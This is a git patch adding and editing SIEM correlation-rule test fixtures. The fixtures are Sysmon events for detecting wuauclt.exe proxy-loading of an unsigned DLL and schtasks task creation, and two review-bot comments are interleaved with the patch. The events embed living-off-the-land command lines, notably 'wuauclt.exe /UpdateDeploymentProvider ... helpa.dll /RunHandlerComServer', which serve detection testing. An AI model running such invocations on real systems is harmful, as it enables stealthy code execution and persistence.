index dab733fa..37b027ba 100644
--- a/packages/windows_open_package/correlation_rules/mitre_attck_execution/Detect_execution_imageload_wuauclt_lolbas/tests/test_1.sc
+++ b/packages/windows_open_package/correlation_rules/mitre_attck_execution/Detect_execution_imageload_wuauclt_lolbas/tests/test_1.sc
@@ -1,4 +1,4 @@ -{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"7\",\"Version\":\"3\",\"Level\":\"4\",\"Task\":\"7\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-10-13T20:11:42.2692242Z\"},\"EventRecordID\":\"2196441\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"5340\",\"ThreadID\":\"7092\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"LAPTOP-JU4M3I0E\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-10-13 20:11:42.268\"},{\"Name\":\"ProcessGuid\",\"text\":\"{00247c92-09fe-5f86-0000-001051841401}\"},{\"Name\":\"ProcessId\",\"text\":\"1716\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\wuauclt.exe\"},{\"Name\":\"ImageLoaded\",\"text\":\"C:\\\\ProgramData\\\\Intel\\\\helpa.dll\"},{\"Name\":\"FileVersion\",\"text\":\"?\"},{\"Name\":\"Description\",\"text\":\"?\"},{\"Name\":\"Product\",\"text\":\"?\"},{\"Name\":\"Company\",\"text\":\"?\"},{\"Name\":\"OriginalFileName\",\"text\":\"?\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=AF7687063F8EE1C8FD57D1A5FE6FA4F28A53C434,MD5=6AB43126243BE72FF7D446D5A496AA76,SHA256=56C5AFF6AC04BDF86EDBC4F0D0F9581F250A4C97DD60FD1179F153AC20230920,IMPHASH=8DEF796746DD54062D5B3186EEF39356\"},{\"Name\":\"Signed\",\"text\":\"false\"},{\"Name\":\"Signature\"},{\"Name\":\"SignatureStatus\",\"text\":\"Unavailable\"}]}}}", "category.generic": "Executable Module", "category.high": "Availability Management", "category.low": "Control", "event_src.category": "Other", "event_src.fqdn": "laptop-ju4m3i0e", "event_src.host": "laptop-ju4m3i0e", "event_src.hostname": "laptop-ju4m3i0e", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", 
"generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_7_Image_loaded", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "7", "normalized": true, "object": "module", "object.process.fullpath": "c:\\programdata\\intel\\helpa.dll", "object.process.hash.imphash": "8DEF796746DD54062D5B3186EEF39356", "object.process.hash.md5": "6AB43126243BE72FF7D446D5A496AA76", "object.process.hash.sha1": "AF7687063F8EE1C8FD57D1A5FE6FA4F28A53C434", "object.process.hash.sha256": "56C5AFF6AC04BDF86EDBC4F0D0F9581F250A4C97DD60FD1179F153AC20230920", "object.process.meta": "Description:? | Product:? | Company:?", "object.process.name": "helpa.dll", "object.process.original_name": "?", "object.process.path": "c:\\programdata\\intel\\", "object.property": "signature status", "object.value": "not signed", "object.version": "?", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-12T13:57:45.353Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\wuauclt.exe", "subject.process.guid": "00247c92-09fe-5f86-0000-001051841401", "subject.process.id": "1716", "subject.process.name": "wuauclt.exe", "subject.process.path": "c:\\windows\\system32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-10-13T20:11:42.268Z", "type": "raw", "uuid": "0d97b86b-f82b-4c18-8d42-4c0ca5771038"} +{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"7\",\"Version\":\"3\",\"Level\":\"4\",\"Task\":\"7\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-10-13T20:11:42.2692242Z\"},\"EventRecordID\":\"2196441\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"5340\",\"ThreadID\":\"7092\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"LAPTOP-JU4M3I0E\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-10-13 20:11:42.268\"},{\"Name\":\"ProcessGuid\",\"text\":\"{00247c92-09fe-5f86-0000-001051841401}\"},{\"Name\":\"ProcessId\",\"text\":\"1716\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\wuauclt.exe\"},{\"Name\":\"ImageLoaded\",\"text\":\"C:\\\\ProgramData\\\\Intel\\\\helpa.dll\"},{\"Name\":\"FileVersion\",\"text\":\"?\"},{\"Name\":\"Description\",\"text\":\"?\"},{\"Name\":\"Product\",\"text\":\"?\"},{\"Name\":\"Company\",\"text\":\"?\"},{\"Name\":\"OriginalFileName\",\"text\":\"?\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=AF7687063F8EE1C8FD57D1A5FE6FA4F28A53C434,MD5=6AB43126243BE72FF7D446D5A496AA76,SHA256=56C5AFF6AC04BDF86EDBC4F0D0F9581F250A4C97DD60FD1179F153AC20230920,IMPHASH=8DEF796746DD54062D5B3186EEF39356\"},{\"Name\":\"Signed\",\"text\":\"false\"},{\"Name\":\"Signature\"},{\"Name\":\"SignatureStatus\",\"text\":\"Unavailable\"}]}}}", "category.generic": "Executable Module", "category.high": "Availability Management", "category.low": "Control", "event_src.category": "Other", "event_src.fqdn": "laptop-ju4m3i0e", "event_src.host": "laptop-ju4m3i0e", "event_src.hostname": "laptop-ju4m3i0e", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", 
"generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_7_Image_loaded", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "7", "normalized": true, "object": "module", "object.process.fullpath": "c:\\programdata\\intel\\helpa.dll", "object.process.hash.imphash": "8DEF796746DD54062D5B3186EEF39356", "object.process.hash.md5": "6AB43126243BE72FF7D446D5A496AA76", "object.process.hash.sha1": "AF7687063F8EE1C8FD57D1A5FE6FA4F28A53C434", "object.process.hash.sha256": "56C5AFF6AC04BDF86EDBC4F0D0F9581F250A4C97DD60FD1179F153AC20230920", "object.process.meta": "Description:? | Product:? | Company:?", "object.process.name": "helpa.dll", "object.process.original_name": "?", "object.process.path": "c:\\programdata\\intel\\", "object.property": "signature status", "object.value": "not signed", "object.version": "?", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-12T13:57:45.354Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\wuauclt.exe", "subject.process.guid": "00247c92-09fe-5f86-0000-001051841401", "subject.process.id": "1716", "subject.process.name": "wuauclt.exe", "subject.process.path": "c:\\windows\\system32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-10-13T20:11:42.268Z", "type": "raw", "uuid": "63b9ed71-a0a7-4346-b8d1-40318fab1353"} # Тут будет твой тест. 
В секции expect укажи сколько и каких корреляционных событий ты ожидаешь -expect 1 {"action": "start", "alert.key": "c:\\programdata\\intel\\helpa.dll", "category.generic": "Attack", "category.high": "Execution", "category.low": "System Binary Proxy Execution", "correlation_name": "Detect_execution_imageload_wuauclt_lolbas", "correlation_type": "incident", "event_src.category": "Other", "event_src.fqdn": "laptop-ju4m3i0e", "event_src.host": "laptop-ju4m3i0e", "event_src.hostname": "laptop-ju4m3i0e", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "correlationengine", "importance": "high", "incident.aggregation.key": "Detect_execution_imageload_wuauclt_lolbas|laptop-ju4m3i0e||c:\\programdata\\intel\\helpa.dll", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "high", "object": "module", "object.process.fullpath": "c:\\programdata\\intel\\helpa.dll", "object.process.meta": "Description:? | Product:? 
| Company:?", "object.process.name": "helpa.dll", "object.process.original_name": "?", "object.process.path": "c:\\programdata\\intel\\", "object.property": "signature status", "object.value": "not signed", "object.version": "?", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\wuauclt.exe", "subject.process.guid": "00247c92-09fe-5f86-0000-001051841401", "subject.process.id": "1716", "subject.process.name": "wuauclt.exe", "subject.process.path": "c:\\windows\\system32\\"} \ No newline at end of file +expect 1 {"action": "start", "alert.key": "c:\\programdata\\intel\\helpa.dll", "category.generic": "Attack", "category.high": "Execution", "category.low": "System Binary Proxy Execution", "correlation_name": "Detect_execution_imageload_wuauclt_lolbas", "correlation_type": "incident", "event_src.category": "Other", "event_src.fqdn": "laptop-ju4m3i0e", "event_src.host": "laptop-ju4m3i0e", "event_src.hostname": "laptop-ju4m3i0e", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "high", "incident.aggregation.key": "Detect_execution_imageload_wuauclt_lolbas|laptop-ju4m3i0e||c:\\programdata\\intel\\helpa.dll", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "high", "object": "module", "object.process.fullpath": "c:\\programdata\\intel\\helpa.dll", "object.process.meta": "Description:? | Product:? 
| Company:?", "object.process.name": "helpa.dll", "object.process.original_name": "?", "object.process.path": "c:\\programdata\\intel\\", "object.property": "signature status", "object.value": "not signed", "object.version": "?", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\wuauclt.exe", "subject.process.guid": "00247c92-09fe-5f86-0000-001051841401", "subject.process.id": "1716", "subject.process.name": "wuauclt.exe", "subject.process.path": "c:\\windows\\system32\\"} \ No newline at end of file diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_execution/Detect_execution_imageload_wuauclt_lolbas/tests/test_2.sc b/packages/windows_open_package/correlation_rules/mitre_attck_execution/Detect_execution_imageload_wuauclt_lolbas/tests/test_2.sc index d494102f..8e6bace8 100644 --- a/packages/windows_open_package/correlation_rules/mitre_attck_execution/Detect_execution_imageload_wuauclt_lolbas/tests/test_2.sc +++ b/packages/windows_open_package/correlation_rules/mitre_attck_execution/Detect_execution_imageload_wuauclt_lolbas/tests/test_2.sc 
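Review bot: Both fixtures for this rule are positive cases — the expect block at the end of this hunk and the one in test_2.sc both read `expect 1` — so the suite cannot detect a regression that widens the rule to every wuauclt.exe image load. A companion test carrying a wuauclt.exe load of a signed system module and ending in `expect 0` would pin the negative side of the rule. Separately, the new raw event's `uuid` is now `63b9ed71-a0a7-4346-b8d1-40318fab1353`, the same value the raw event in test_2.sc carries; that is harmless if each file is replayed in isolation, but fixtures are easier to trace when their ids are distinct. Both files also still end without a trailing newline (`\ No newline at end of file` on old and new side), which this commit could have tidied while it was touching the expect lines.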
@@ -1,4 +1,4 @@ {"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-10-13T20:11:42.2786722Z\"},\"EventRecordID\":\"2196442\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"5340\",\"ThreadID\":\"7092\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"LAPTOP-JU4M3I0E\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-10-13 20:11:42.277\"},{\"Name\":\"ProcessGuid\",\"text\":\"{00247c92-09fe-5f86-0000-0010ac861401}\"},{\"Name\":\"ProcessId\",\"text\":\"6372\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.18362.449 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Windows Command Processor\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft 
Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"Cmd.Exe\"},{\"Name\":\"CommandLine\",\"text\":\"c:\\\\windows\\\\system32\\\\cmd.exe\"},{\"Name\":\"CurrentDirectory\",\"text\":\"c:\\\\Windows\\\\System32\\\\\"},{\"Name\":\"User\",\"text\":\"LAPTOP-JU4M3I0E\\\\bouss\"},{\"Name\":\"LogonGuid\",\"text\":\"{00247c92-de70-5f85-0000-002059f80600}\"},{\"Name\":\"LogonId\",\"text\":\"0x6f859\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"Medium\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{00247c92-09fe-5f86-0000-001051841401}\"},{\"Name\":\"ParentProcessId\",\"text\":\"1716\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\wuauclt.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"wuauclt.exe /UpdateDeploymentProvider C:\\\\ProgramData\\\\Intel\\\\helpa.dll /RunHandlerComServer\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "00247c92-de70-5f85-0000-002059f80600", "event_src.category": "Other", "event_src.fqdn": "laptop-ju4m3i0e", "event_src.host": "laptop-ju4m3i0e", "event_src.hostname": "laptop-ju4m3i0e", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "laptop-ju4m3i0e", "object.account.id": "synthetic:bouss@laptop-ju4m3i0e", "object.account.name": "bouss", "object.account.privileges": "Medium", 
"object.account.session_id": "456793", "object.process.cmdline": "c:\\windows\\system32\\cmd.exe", "object.process.cwd": "c:\\Windows\\System32\\", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.guid": "00247c92-09fe-5f86-0000-0010ac861401", "object.process.hash.imphash": "272245E2988E1E430500B852C4FB5E18", "object.process.hash.md5": "D7AB69FAD18D4A643D84A271DFC0DBDF", "object.process.hash.sha1": "8DCA9749CD48D286950E7A9FA1088C937CBCCAD4", "object.process.hash.sha256": "FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5", "object.process.id": "6372", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "cmd.exe", "object.process.original_name": "Cmd.Exe", "object.process.parent.cmdline": "wuauclt.exe /UpdateDeploymentProvider C:\\ProgramData\\Intel\\helpa.dll /RunHandlerComServer", "object.process.parent.fullpath": "c:\\windows\\system32\\wuauclt.exe", "object.process.parent.guid": "00247c92-09fe-5f86-0000-001051841401", "object.process.parent.id": "1716", "object.process.parent.name": "wuauclt.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.18362.449 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-12T13:57:45.354Z", "status": "success", "subject": "account", "subject.account.domain": "laptop-ju4m3i0e", "subject.account.id": "synthetic:bouss@laptop-ju4m3i0e", "subject.account.name": "bouss", "subject.account.privileges": "Medium", "subject.account.session_id": "456793", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-10-13T20:11:42.277Z", "type": "raw", "uuid": "63b9ed71-a0a7-4346-b8d1-40318fab1353"} # Тут будет твой тест. 
В секции expect укажи сколько и каких корреляционных событий ты ожидаешь -expect 1 {"action": "start", "alert.key": "wuauclt.exe /updatedeploymentprovider c:\\programdata\\intel\\helpa.dll /runhandlercomserver", "category.generic": "Attack", "category.high": "Execution", "category.low": "System Binary Proxy Execution", "correlation_name": "Detect_execution_imageload_wuauclt_lolbas", "correlation_type": "incident", "datafield6": "00247c92-de70-5f85-0000-002059f80600", "event_src.category": "Other", "event_src.fqdn": "laptop-ju4m3i0e", "event_src.host": "laptop-ju4m3i0e", "event_src.hostname": "laptop-ju4m3i0e", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "correlationengine", "importance": "high", "incident.aggregation.key": "Detect_execution_imageload_wuauclt_lolbas|laptop-ju4m3i0e|wuauclt.exe /UpdateDeploymentProvider C:\\ProgramData\\Intel\\helpa.dll /RunHandlerComServer|c:\\windows\\system32\\cmd.exe", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "high", "object": "process", "object.account.domain": "laptop-ju4m3i0e", "object.account.id": "synthetic:bouss@laptop-ju4m3i0e", "object.account.name": "bouss", "object.account.session_id": "456793", "object.process.cmdline": "c:\\windows\\system32\\cmd.exe", "object.process.cwd": "c:\\Windows\\System32\\", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.guid": "00247c92-09fe-5f86-0000-0010ac861401", "object.process.id": "6372", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "cmd.exe", "object.process.original_name": "Cmd.Exe", "object.process.parent.cmdline": "wuauclt.exe /UpdateDeploymentProvider C:\\ProgramData\\Intel\\helpa.dll /RunHandlerComServer", "object.process.parent.fullpath": "c:\\windows\\system32\\wuauclt.exe", 
"object.process.parent.guid": "00247c92-09fe-5f86-0000-001051841401", "object.process.parent.id": "1716", "object.process.parent.name": "wuauclt.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.18362.449 (WinBuild.160101.0800)", "status": "success", "subject": "account", "subject.account.domain": "laptop-ju4m3i0e", "subject.account.id": "synthetic:bouss@laptop-ju4m3i0e", "subject.account.name": "bouss", "subject.account.privileges": "Medium", "subject.account.session_id": "456793"} \ No newline at end of file +expect 1 {"action": "start", "alert.key": "wuauclt.exe /updatedeploymentprovider c:\\programdata\\intel\\helpa.dll /runhandlercomserver", "category.generic": "Attack", "category.high": "Execution", "category.low": "System Binary Proxy Execution", "correlation_name": "Detect_execution_imageload_wuauclt_lolbas", "correlation_type": "incident", "datafield6": "00247c92-de70-5f85-0000-002059f80600", "event_src.category": "Other", "event_src.fqdn": "laptop-ju4m3i0e", "event_src.host": "laptop-ju4m3i0e", "event_src.hostname": "laptop-ju4m3i0e", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "high", "incident.aggregation.key": "Detect_execution_imageload_wuauclt_lolbas|laptop-ju4m3i0e|wuauclt.exe /UpdateDeploymentProvider C:\\ProgramData\\Intel\\helpa.dll /RunHandlerComServer|c:\\windows\\system32\\cmd.exe", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "high", "object": "process", "object.account.domain": "laptop-ju4m3i0e", "object.account.id": "synthetic:bouss@laptop-ju4m3i0e", "object.account.name": "bouss", "object.account.session_id": "456793", "object.process.cmdline": "c:\\windows\\system32\\cmd.exe", "object.process.cwd": "c:\\Windows\\System32\\", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.guid": 
"00247c92-09fe-5f86-0000-0010ac861401", "object.process.id": "6372", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "cmd.exe", "object.process.original_name": "Cmd.Exe", "object.process.parent.cmdline": "wuauclt.exe /UpdateDeploymentProvider C:\\ProgramData\\Intel\\helpa.dll /RunHandlerComServer", "object.process.parent.fullpath": "c:\\windows\\system32\\wuauclt.exe", "object.process.parent.guid": "00247c92-09fe-5f86-0000-001051841401", "object.process.parent.id": "1716", "object.process.parent.name": "wuauclt.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.18362.449 (WinBuild.160101.0800)", "status": "success", "subject": "account", "subject.account.domain": "laptop-ju4m3i0e", "subject.account.id": "synthetic:bouss@laptop-ju4m3i0e", "subject.account.name": "bouss", "subject.account.privileges": "Medium", "subject.account.session_id": "456793"} \ No newline at end of file From 8d871739191f1cc4f4f0d65c95633067b2970644 Mon Sep 17 00:00:00 2001 
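Review bot: The expected `incident.aggregation.key` on the new expect line keeps the parent command line in its original case (`...|wuauclt.exe /UpdateDeploymentProvider C:\\ProgramData\\Intel\\helpa.dll /RunHandlerComServer|...`) while `alert.key` on the same line is the lowercased form of that string; if the rule really builds the aggregation key from the raw cmdline, the same activity logged with different casing would open separate incidents instead of aggregating, so that is worth confirming before this test locks the value in. If the case-sensitive key is intended, a one-line `# aggregation key deliberately keeps the raw cmdline case` above the expect block would save the next reader the same question. The expect block also asserts `object.account.session_id` and `datafield6` (a logon GUID), which are per-session values that make the fixture brittle without adding to what the rule is meant to prove.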
From: shadow2033 <135636880+shadow2033@users.noreply.github.com>
Date: Tue, 1 Aug 2023 10:27:59 +0300
Subject: [PATCH 33/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?=
 =?UTF-8?q?=D0=B5=D0=BD=D1=8B=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD?=
 =?UTF-8?q?=D1=8B=D0=B5=20=D1=82=D0=B5=D1=81=D1=82=D1=8B=20=D0=B4=D0=BB?=
 =?UTF-8?q?=D1=8F=20=D0=BF=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(Schtasks?=
 =?UTF-8?q?=5FCommandline)?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 .../Schtasks_Commandline/tests/test_1.sc | 4 ++++
 .../Schtasks_Commandline/tests/test_2.sc | 5 +++++
 .../Schtasks_Commandline/tests/test_3.sc | 4 ++++
 3 files changed, 13 insertions(+)
 create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_execution/Schtasks_Commandline/tests/test_1.sc
 create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_execution/Schtasks_Commandline/tests/test_2.sc
 create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_execution/Schtasks_Commandline/tests/test_3.sc
diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_execution/Schtasks_Commandline/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_execution/Schtasks_Commandline/tests/test_1.sc
new file mode 100644
index 00000000..9d144753
--- /dev/null
+++ b/packages/windows_open_package/correlation_rules/mitre_attck_execution/Schtasks_Commandline/tests/test_1.sc
@@ -0,0 +1,4 @@ +{"action": "start", "body": "{ \"Event\": { \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\", \"System\": { \"Provider\": { \"Name\": \"Microsoft-Windows-Sysmon\", \"Guid\": \"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\" }, \"EventID\": \"1\", \"Version\": \"5\", \"Level\": \"4\", \"Task\": \"1\", \"Opcode\": \"0\", \"Keywords\": \"0x8000000000000000\", \"TimeCreated\": { \"SystemTime\": \"2021-08-16T13:16:24.2433848Z\" }, \"EventRecordID\": \"10277287\", \"Correlation\": null, \"Execution\": { \"ProcessID\": \"3548\", \"ThreadID\": \"4948\" }, \"Channel\": \"Microsoft-Windows-Sysmon/Operational\", \"Computer\": \"Test_w10x64-130.testlab.org\", \"Security\": { \"UserID\": \"S-1-5-18\" } }, \"EventData\": { \"Data\": [ { \"Name\": \"RuleName\" }, { \"text\": \"2021-08-16 13:16:24.239\", \"Name\": \"UtcTime\" }, { \"text\": \"{63310a87-6528-611a-0000-00106bb3f401}\", \"Name\": \"ProcessGuid\" }, { \"text\": \"8668\", \"Name\": \"ProcessId\" }, { \"text\": \"C:\\\\Windows\\\\System32\\\\schtasks.exe\", \"Name\": \"Image\" }, { \"text\": \"10.0.19041.906 (WinBuild.160101.0800)\", \"Name\": \"FileVersion\" }, { \"text\": \"Task Scheduler Configuration Tool\", \"Name\": \"Description\" }, { \"text\": \"Microsoft® Windows® Operating System\", \"Name\": \"Product\" }, { \"text\": \"Microsoft Corporation\", \"Name\": \"Company\" }, { \"text\": \"schtasks.exe\", \"Name\": \"OriginalFileName\" }, { \"text\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\schtasks.exe\\\" -create -tn test /sc Onstart\", \"Name\": \"CommandLine\" }, { \"text\": \"C:\\\\Users\\\\username\\\\Desktop\\\\\", \"Name\": \"CurrentDirectory\" }, { \"text\": \"TESTLAB\\\\username\", \"Name\": \"User\" }, { \"text\": \"{63310a87-5f74-611a-0000-00204f8fcc01}\", \"Name\": \"LogonGuid\" }, { \"text\": \"0x1cc8f4f\", \"Name\": \"LogonId\" }, { \"text\": \"2\", \"Name\": \"TerminalSessionId\" }, { \"text\": \"High\", \"Name\": \"IntegrityLevel\" }, { \"text\": 
\"MD5=796B784E98008854C27F4B18D287BA30,SHA256=356280CCA63CA5E887FDBE5CB4105A53341FBAC9219EFC51621DF9BA8EE9838B\", \"Name\": \"Hashes\" }, { \"text\": \"{63310a87-64dd-611a-0000-0010b515f401}\", \"Name\": \"ParentProcessGuid\" }, { \"text\": \"7148\", \"Name\": \"ParentProcessId\" }, { \"text\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\", \"Name\": \"ParentImage\" }, { \"text\": \"\\\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" \", \"Name\": \"ParentCommandLine\" } ] }, \"RenderingInfo\": { \"Culture\": \"en-US\", \"Message\": \"Process Create:\\r\\nRuleName: \\r\\nUtcTime: 2021-08-16 13:16:24.239\\r\\nProcessGuid: {63310a87-6528-611a-0000-00106bb3f401}\\r\\nProcessId: 8668\\r\\nImage: C:\\\\Windows\\\\System32\\\\schtasks.exe\\r\\nFileVersion: 10.0.19041.906 (WinBuild.160101.0800)\\r\\nDescription: Task Scheduler Configuration Tool\\r\\nProduct: Microsoft® Windows® Operating System\\r\\nCompany: Microsoft Corporation\\r\\nOriginalFileName: schtasks.exe\\r\\nCommandLine: \\\"C:\\\\WINDOWS\\\\system32\\\\schtasks.exe\\\" -create -tn test /sc Onstart\\r\\nCurrentDirectory: C:\\\\Users\\\\username\\\\Desktop\\\\\\r\\nUser: TESTLAB\\\\username\\r\\nLogonGuid: {63310a87-5f74-611a-0000-00204f8fcc01}\\r\\nLogonId: 0x1CC8F4F\\r\\nTerminalSessionId: 2\\r\\nIntegrityLevel: High\\r\\nHashes: MD5=796B784E98008854C27F4B18D287BA30,SHA256=356280CCA63CA5E887FDBE5CB4105A53341FBAC9219EFC51621DF9BA8EE9838B\\r\\nParentProcessGuid: {63310a87-64dd-611a-0000-0010b515f401}\\r\\nParentProcessId: 7148\\r\\nParentImage: C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\r\\nParentCommandLine: \\\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" \", \"Level\": \"Information\", \"Task\": \"Process Create (rule: ProcessCreate)\", \"Opcode\": \"Info\", \"Channel\": null, \"Provider\": null, \"Keywords\": null } } }", "category.generic": "Process", "category.high": "Availability 
